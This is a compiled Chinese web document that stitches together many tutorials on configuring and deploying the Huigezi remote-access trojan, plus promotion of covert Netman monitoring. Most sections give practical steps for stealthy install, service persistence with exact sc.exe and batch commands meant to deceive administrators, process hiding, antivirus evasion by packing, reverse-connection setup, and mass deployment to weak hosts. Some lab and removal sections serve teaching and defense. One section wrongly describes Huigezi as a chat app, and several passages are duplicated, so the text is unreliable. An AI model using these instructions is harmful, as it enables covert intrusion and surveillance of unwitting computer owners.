灰鸽子使用教程+网络人远程控制软件教程图解12页word文档
灰鸽子远程控制实验
实验名称: 灰鸽子远程控制实验实验要求:[实验目的]1、掌握远程控制攻击技术的原理。
2、学会使用常见的远程控制工具。
3、掌握远程控制攻击的防范措施。
[实验环境]◆网络:局域网环境。
◆远程计算机◇操作系统:Windows XP Server◇软件:运行了灰鸽子 [牵手 2004] 服务器端程序(setup.exe)。
◆本地计算机◇操作系统:Windows XP主机◇软件:灰鸽子[牵手2004]。
[实验内容]◆远程文件控制。
◆远程屏幕查看。
◆远程进程查看。
◆远程网络信息查看。
◆读取远端服务器配置。
实验指导:1、远程主机上的服务端配置∙ 运行实验工具目录下的。
∙ 点击按钮,或者选择"文件"菜单项中的"配置服务端程序"。
∙ 在连接类型下选定主动连接型,填入 监听端口 和 备用端口 。
∙ 在安装信息下填入连接密码,并选择对安装文件的处置方式。
图示中我们输入了密码123456,选择了“自动删除安装文件”。
“提示信息”“启动项目”“邮件通知”“代理服务”“绑定文件”我们都由系统默认。
∙ 在 保存路径 填入地址C:\Setup.exe,点击。
∙ 在C:\下执行。
此时已在远程主机上安装服务器成功2、客户端控制∙ 运行实验工具目录下的。
∙ 在主界面点。
填入远程主机IP及密码或者直接在主界面“当前连接”、“端口”、“连接密码”中填入填入远程主机IP、端口、连接密码,如下图。
∙ 在主界面"文件管理器"选项卡左侧的列表中点击选中所添加的目标主机("192.168.123.90)节点,观察在右侧文件树中是否能够查看到目标服务器上的驱动器列表。
∙ 在"文件管理器"中展开目标服务器的节点,在右边的文件列表中找到以下文件C:\ServerData\test.txt,将其下载到本地计算机。
请将该文件的内容导入到实验报告中。
∙ 切换到""远程控制命令"选项卡,先点左下角“查看进程”,再点右侧。
灰鸽子怎么用
灰鸽子怎么用1. 简介灰鸽子是一款简单实用的即时通讯工具,允许用户在网络上发送即时消息、进行语音通话和视频通话等。
本文将介绍如何使用灰鸽子,包括账号注册、登录、添加好友、发送消息等功能。
2. 注册与登录2.1 注册账号•打开灰鸽子应用程序并点击注册按钮。
•在注册界面填写必要的信息,包括用户名、密码、手机号码等。
•完成注册后,系统将发送一条验证短信至注册时填写的手机号码,请按照提示操作完成验证即可。
2.2 登录账号•打开灰鸽子应用程序并输入已注册的用户名和密码。
•点击登录按钮,等待系统验证身份。
•验证通过后,即可成功登录灰鸽子账号。
3. 添加好友3.1 通过用户名添加好友•登录成功后,点击左上角的菜单按钮,选择“添加好友”功能。
•在输入框内输入要添加的好友用户名。
•点击“添加”按钮,系统将发送添加好友请求。
•如果对方接受了你的请求,你们将成为好友。
3.2 通过二维码添加好友•你可以向对方索取好友的二维码,或者提供你自己的二维码给对方。
•点击左上角的菜单按钮,选择“扫描二维码”功能。
•将相机对准对方的二维码,系统将自动识别并发送添加好友请求。
•如果对方接受了你的请求,你们将成为好友。
4. 发送消息4.1 发送文本消息•在聊天界面,输入要发送的文本消息。
•点击发送按钮或按下Enter键,文本消息将发送给对方。
4.2 发送语音消息•在聊天界面,点击语音按钮以开始录制语音消息。
•录制完成后,点击发送按钮,语音消息将发送给对方。
4.3 发送图片消息•在聊天界面,点击图片按钮,在手机相册中选择要发送的图片。
•点击发送按钮,图片消息将发送给对方。
5. 语音通话和视频通话5.1 发起语音通话•在好友列表或聊天界面,点击“语音通话”按钮,发起语音通话。
•如果对方接受了通话请求,你们将开始进行语音通话。
5.2 发起视频通话•在好友列表或聊天界面,点击“视频通话”按钮,发起视频通话。
•如果对方接受了通话请求,你们将开始进行视频通话。
如何使用灰鸽子软件
灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
灰鸽子使用教程图解
灰鸽子使用教程图解(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
灰鸽子 使用 方法 详细 说明(1)(8)
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件
。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,
取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中
选择“显示所有文件和文件夹”,然后点击“确定”。
作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这
两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就
可以进行手动清除。
二、灰鸽子的手工清除
经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下
的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除
灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电
脑的用户都会启动木马。
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务
器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~
录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和
G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和
G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,
G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件
操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。
注意:为防止误操作,清除前一定要做好备份。
灰鸽子内网上线教程
序:灰鸽子是国内一款著名后门。
比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。
其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。
当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
灰鸽子是一款反弹连接式的木马。
现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。
所以这些用的IP都是内网IP。
如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。
但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。
这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。
(8000端口是灰鸽子的默认端口,这个端口是可以更改的)要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。
不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。
内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport工具做端口映射……总之方法很多,设置也很简单。
如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。
如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。
因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。
因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。
(整理)灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
灰鸽子使用教程 灰鸽子如何使用?
灰鸽子使用教程灰鸽子如何使用?
导读:灰鸽子是一款远程控制软件,不过这款软件刚推出的时候是定义为公司和家庭管理的软件,由于软件设计存在缺陷,被黑客恶意使用,使得这款软件被定义为木马程序。
下面给大家介绍灰鸽子的使用教程。
1、先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的;
2、打开后灰鸽子,我们先点击ftp更新我们的动态域名;
3、更新成功在打开配置服务端,写上更新好的域名;
4、这里是运行后服务端释放的目录,大家根据自己的要求来写;
5、这个是选择用什么进程的名字,我这个是使用ie进程;
6、配置好后,就是有一个Server.exe,运行后就可以在主控端里面看到了;
7、主控端显示的界面就是这样的;
灰鸽子这款软件本身是不具备传播性的,一般是他人通过捆绑的方式进行传播,传播方式有网页传播、邮件传播、IM聊天工具传播、非法软件传播。
灰鸽子远程控制完整详细教程
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
网络人远程控制软件和灰鸽子木马的区别
五、软件不断升级加壳
木马经常为了表示它免杀,经常给软件不断升级,其实就是不断给软件加壳。不过现在360的云查杀,完全可以识别MD5码来查杀,加壳木马是不可能,所以木马没有免杀的,只有它被查出来的时间迟早问题。所以木马软件都会提示您退出杀毒安装、运行。
而合法的远程控制软件账号相反。
以网络人远程控制软件,专注于合法的企业监控员工电脑、科教实验监控等领域。合法网络人远程控制软件和木马的区别也显而易见:
灰鸽子黑客肉鸡产业链
一、安装隐秘。
看不到安装过程,瞬间没有任何提示的安装。明显灰鸽子就可以实现这个功能。
二、伪装进程。
这个是木马常用的技量,您没有打开ie,但您在在进程中可以看到ie经常,那您估计中了木马。更隐秘的木马就隐藏在system的windows系统进程中,伪装windows系统程序。这种木马连杀毒软件都很难辨别、或者误杀导致系统崩溃。同时灰鸽子也可以实现进程伪装,灰鸽子的功能很明显符合木马病毒的定义,金山也有灰鸽子的专杀工具。
网络人360软件安全认证
一、有安装过程
网络人远程控制软件有安装过程、有协助程序。有统一的目录,有协助程序。
二、netman的进程,不隐藏进程。
三、注册不用第三平台登陆。
网络人远程控制软件直接注册软件账号,不做其他啊注册。
四、在服务列表中能暂停、启动软件服务
在我的电脑-服务中可以看到网络人远程控制软件的启动服务,您可以暂停、启动、卸载服务。
网络人远程控制软件和灰鸽子木马的区别我们知道远程控制类软件安有合法的,和非法的。合法的就是通过正常安装,可以在进程中、安装注册表中明确找到的,如网络人远程控制软件(通过数据认证、360软件安全认证等)。
非法的“远程控制软件”其实就是木马病毒打着“免杀”、“远程控制软件”的幌子出售。非法木马冒充“远程控制类”的区别方法.
灰鸽子教程
准备工具:鸽子服务端IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar程序特点:自解压形式,双击即可制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
其他的随你个人爱好。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start 为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。
灰鸽子使用方法
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
第三步:获取帐号和密码,登录主机
攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件,进机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。
由此可见,没有扫描,自然也就没有攻击,从安全的角度的来说,个人主机最安全的系统应 该算是WINDOWS98,由于WINDOWS98几乎不开启任何服务,自然也没有任何开放端口,没有端 口,对于这类系统攻击的可能性就大大降低。当然,XP在打了SP2的补丁后,等于有了一个 基于状态的个人防火墙,相对安全性也提高了很多。
在这些工具中,国产的X-scan与流光可算的上是两个“利器”,这两个工具不但具有相当快 的扫描速度和精确度(个人感觉X-scan在扫描速度上可能更快一点),同时还是发起攻击的 第一手选择,当然在攻击方面,流光更为强悍些。
除了常见个WWW(80)、FTP(21)、TELNET(23)等,查查十大高风险事件,我们就知道, 攻击者通常还对下列端口很感兴趣:
第五步:窃取网络资源和特权
攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;窃取帐号密码、 个人资料等。
三、网络攻击的原理和手法
1、从扫描开始
扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。 常见的扫描工具有X-scan、superscan、流光、X-port等。
灰鸽子远程控制软件(精)
灰鸽子的发展简史
模仿期(2001年-2003年) 飞速发展期(2004年-2005年) 全民黑客时代(2006年-2007年)
灰鸽子的发展简史-模仿期
“反弹连接”技术则可以很轻松地刺穿防火墙, 因为防火墙通常对外部连接过滤严密,而对于 本机主动连接则疏于防范。
虚拟驱动,监控摄像头
灰鸽子在“屏幕控制”功能上率先使用了“虚 拟驱动”技术,这项技术可以使“屏幕监控” 更加流畅, 大大提高了控制的准确性。
用软件实现的硬件应该就叫虚拟设备,对应的驱动 程序就叫虚拟设备驱动程序;
“脱壳”指的就是将文件外边的壳去除,恢复文件 没有加壳前的状态。
灰鸽子的具体操作策略
灰鸽子客户端和服务端都是采用Delphi编写。 黑客利用客户端程序配置出服务端程序。可配
置的信息主要包括上线类型(如等待连接还是 主动连接)、主动连接时使用的公网IP(域 名)、连接密码、使用的端口、启动项名称、 服务名称,进程隐藏方式,使用的壳,代理, 图标等等。
通过换“壳”,可以使灰鸽子免于被杀;
补充:关于“壳”
在一些计算机软件里也有一段专门负责保护软 件不被非法修改或反编译的壳。它们一般都是 先于程序运行,拿到控制权,然后做保护软件 的工作。
从“壳”又延伸出“加壳”和“脱壳”两个词 汇;
“加壳”指的是对编译好的EXE、DLL等文件采用 加壳来进行保护;
进程插入,让进程蒸发
“灰鸽子”在配置服务端的时候可以选择插入 “explorer.exe”或者“iexplore.exe ”进程;
实验八 灰鸽的内网上线配置
2014、04、05
实验目的、内容
实验目的:本实验主要学习远程控制软件---灰鸽子的使用和内网配置方法
实验仪器设备:计算机
实验环境:Windows 2000 Server、灰鸽子软件、IPC扫描器
实验内容:
1、首先进行灰鸽子的配置
(1)双击运行灰鸽子软件,这里使用的是灰鸽子暗组专版,界面如图
2.使用IPC扫描器将服务程序上传到所有空口令主机上并运行。如图:
3.过几分钟等服务程序在扫描到的主机上运行后,在灰鸽子上我们看到自动上线主机,这时我们就可以远程监视以及控制对方的主机了。
实验设计过程
调试过程记录
实验结果记录以及与预期结果比较以及分析
总结以及心得体会
通过本次实验,我明白了当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
(2)进行灰鸽子的服务端的配置。
a.单击工具栏的“配置服务程序”按钮,打开配置服务程序界面。
b.单击“自动上线配置”选项卡,在“IP通知http访问地址、DNS解析域名或固定IP”栏中输入本机的IP地址。本机的IP是:172.16.28.2。
c.单击“自动上线配置”选项卡,如图
在“安装路径”里设置服务端的安装路径,这里我们使用默认,在实际操作中可以根据需要选择安装路径。
在“程序图标”里选择程序的图标。然后选择“安装成功后自动删除安装文件”
d.单击“启动项设置”选项卡,如图:
选中“win98/2000/xp下写入注册表启动项”和“win2000/xp”下优选安装成服务启动两项。
在“显示名称”、“服务名称”和“描述信息”里分别填上相关信息。
e.在保存路径里设置程序保存的路径,单击“生成服务器”,生成服务器程序。
实验五-灰鸽子木马实验指导
实验五灰鸽子木马实验一、灰鸽子简介:灰鸽子是国内一款著名后门。
比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。
其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。
当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
灰鸽子包含客户端和服务端。
黑客利用客户端程序配置出服务端程序。
可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
二、实验分组安排本实验两人一组,一人为客户端,一人为服务器端;完成实验过程后,互相交换角色;客户端完成控制等实验,服务器端完成手动卸载木马。
三、实验操作步骤:实验前先将客户端和服务器端的瑞星监控禁用,如下图所示:点击右键,选择“禁用所有监控”。
1、客户端操作:双击文件“”,将它解压到目录“黑防灰鸽子2006企业破解版”,完成后,进入该目录,双击文件“黑防鸽子2006控制端.exe”。
灰鸽子控制端界面如图1所示:图12、在客户端生成服务器端:点击图1菜单栏中的“配置服务程序”,弹出图2界面,对服务器进行配置。
图2(1)图2中,在“IP通知http访问地址、DNS解析域名或固定IP ”一栏填写客户端IP地址,同时可以设置上线图象,上线分组,上线备注,连接密码等内容。
(2)选择“安装选项”,“安装路径”选择如图3所示:以其中一人学号命名,同时可以选择更改图标等选项。
图3(3)下面对启动项进行配置(图4):选上“Win2000/XP下优先安装成服务启动”;显示名称:可以任意填写(尽量是与系统有关的单词)服务名称:同上!描述信息:只要说明此项服务是系统服务,十分重要,不可停止的服务就行!这样配置具有很强的蒙蔽性,可以更好的隐藏自己。
要求灰鸽子的使用说明越详细越好。。。
要求灰鸽子的使用说明越详细越好。
分类:电脑/网络 >> 操作系统/系统故障问题描述:要的是步骤。
解析:下载好了打开界面.首先进入眼前的是上方的这样的一行功能图标排列顺序: 自动上线]*[捕获屏幕]*[视频语音]*[T el]*[配置服务端]*[最小化]*[退出] 我们第一件事就是是配置生成一个服务端,因为只有运行过服务端才可以控制机器.以下的选项介绍都是在[配置服务端]里的选项配置生成服务端注意事项(2.0及1.2版本) 配置服务端这个选顶里有六个选项 : [自动上线设置]-[安装选项]-[启动项设置]-[代理服务]-[高级服务]-[插件功能] 我们在下面列出这几个选项第一项:[自动上线设置] [自动上线设置],在这里用户需要注意自动上线的端口是不是跟你要用到的端口一致.(现在所有版本在配置端口的时候不需要设置顶口号.) [备用上线URL转向域名或其它网页]不是内网用户使用域名的就不用填了(内网VIP用户使用第三方软件所申请注册的域名,即内网用户无法映射端口所需要用到的.) 注:现在所有版本都已经可以任意端口上线1.2版本的是没有端口设置的,这是1.2版本的一个特别之处,即你无需生成服务端的时候配置端口.当一台机器运行过你1.2的服务端的时候,你想要它上线,就只要在自动上线那里更新你的公网IP后面加上你的自动上线端口号,你的自动上线端口是8000的话,你就这样更新:公网IP:8000 第二个选项:[安装选项] 这里不同版本也是不尽相同的,这里的安装选项各人可以按照需要配置. 第三个选项:[启动项] 在这里我们可以修改生成服务端的显示名称\\服务名称\\服务描述信息\\ 及两个选项:写入win98/2000/xp注册表启动项和win2000/xp/优先安装成服务启动第四个选项:[代理服务] 在这里是教大家生成基本的服务端.此项就不详细说了,相信到了大家自如运用灰鸽子的时候已经不用说了.呵呵第五个选项:[高级选项] 使用:IEXPLORE.EXE 进程启动服务端程序加壳与不加壳选项上面大家使用默认,下面的加壳与不加壳大家自己选择第六个选项:[插件功能] 2.0版本及1.2版本都是有插件扩展功能的,如果大家需要使用什么类型的插件可以先在此添加到服务端生成就可以了. 到了这里基本上[配置服务端]里的功能选项都差不多介绍完了.现在我们填上注册用户名跟密码赶紧生成你的第一个服务端,生成好了先不要急.再看下面的五条确定再检查一遍. 新手不能上线必须检查对应的几条确定因素现在为大家列出几个个确定,大家按照这五个确定一一来排查原因,相信能够很快的让你的鸽子飞起来的! 一:确定自己是内网还是外网,如内网就需要映射端口或者使用第三方软件来实现,以前的如内网建站专家. 查看自己是内网外网的IP工具下载:更新IP>down.huigezi/tools/FindIp.rar 二:确定自己所带的XP防火墙已经关闭或者你自己已经添加了相应的规则.(正常的打开网络邻居查看网络连接就可以看到防火墙是否开启) 三:确定对方是正确的运行了你所生成的服务端,如果你生成的服务端对方双击运行不了证明对方已经运行了你事先发过的服务端,请先清除再运行! 四:确定你已经将公网IP,复制下来再打开灰鸽子界面的:自动上线--->更新IP> ,前题是你是公网用户或者是映射了端口的用户就可以直接更新公网IP实现外网的机器自动上线.如果你是内网用第三方软件的请更新域名:自动上线端口没有特殊情况下正确的的做到以上几点是可以上线的。
灰鸽子上线方法(史上最全)
灰鸽子上线方法总结引言:灰鸽子上线主要分为内网上线和外网上线其中内网上线又可以分为拥有路由器控制权的内网上线(如宿舍)和没有路由器控制权的内网上线(如网吧,学校机房),内网上线必须经过端口映射到外网iP才能够进行上线.无忧路由器控制权(网吧,机房)---------映射--------外网ip(肉鸡映射)有路由器控制权(宿舍)------映射内网ip------路由器修改路由器映射方法:Cmd命令-----ipconfig(查看自己的内网ip和路由地址)---进入路由器192.1683.1.1----默认账号密码admin admin-----转发规则----8000端口(灰鸽子上线端口)+192.168.1.113(内网ip)------保存如果转发端口较多可以添加DMZ主机,将会把所有端口转发.虚拟机内网上线映射方法,需要将网络连接方式改为bridge,ip地址则会变为192.168.1.xx。
如果是Nat链接方式则为10.5.1.xx 。
无法上线。
内网映射完成以后,则会变为外网ip,然后上线方法则和ADSL拨号上网一样,下面是配置上线的方法。
123.235.84.80动态ip(内网和ADSL拨号上网一般为动态ip每次重启计算机或是重新拨号都会发生ip的改变),所以动态ip应该与动态域名配合使用。
下面是常见的动态域名及使用方法:一、花生壳动态域名需要下载客户端,登录客户端以后,每次ip转换以后,更新一下即可。
鸽子配置上线地址,则填花生壳的域名如二、希网动态域名希网也是动态域名,下载客户端,每次更新一下ip即可,当然也可以登录希网网站进行ip重新设置。
三、5944FTP空间需要FTP更新,更新地址为自己的FTP空间76.73.69.61或账号和密码为FTP账号密码,更新地址可以为内网ip如192.168.1.113:8000或者为外网ip如123.235.84.80:8000,然后鸽子上线地址为FTP空间加ip.txt如/ip.txt四.自己搭建FTP服务器上线此方法不是很容易,因为ip随时改变,以后再加详细教程。
灰鸽子远程控制软件免费啦!可隐藏控制20台电脑!免费用!
灰鸽子远程控制软件免费啦!可隐藏控制20台电脑!免费
用!
灰鸽子是用于老板监控员工的,可以远程控制电脑一切操作。
支持隐蔽监控。
远程桌面、视频、音频、键盘记录、声卡、网页、文件操作、文件反泄密、U盘、搜索审计等等应有尽有。
目前灰鸽子免费,欢迎各种试用。
支持超清画质。
超清摄像头、高质量通话、远程协助!
使用比较简单,下载安装好软件,注册一个账号(通过网页注册可以得到20台电脑免费)
首先,注册并登陆之后,点击生成唯一标识。
如果出现一个小框,请输入你注册的控制密码。
如果不想每次都输入密码,就请点击左下角小齿轮自行设置。
生成唯一标识
第二步,将员工端重命名为您自己的唯一标识。
灰鸽子分为经理端和员工端两部分,经理监控员工。
员工只要重命名成您的唯一标识,即可拿去安装了。
安装之后延迟上线到您经理端列表,操作类似QQ 非常简单。
灰鸽子远程控制软件
右键操作,选中在线员工右键,会出现很多功能。
使用即可。
双击托盘,输入控制密码即可卸载。
也可以点击X号清理本机员工。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
